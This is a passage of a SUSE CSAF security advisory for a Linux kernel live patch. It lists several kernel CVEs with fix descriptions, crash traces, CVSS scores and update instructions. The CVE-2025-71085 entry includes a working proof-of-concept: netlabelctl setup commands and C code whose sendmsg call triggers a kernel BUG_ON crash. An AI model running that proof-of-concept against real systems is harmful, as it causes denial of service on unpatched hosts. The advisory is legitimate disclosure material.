"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1100-1
Vulnerability from csaf_suse - Published: 2026-03-26 23:08 - Updated: 2026-03-26 23:08Summary
Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.81 fixes various security issues
The following security issues were fixed:
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1100,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1100
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
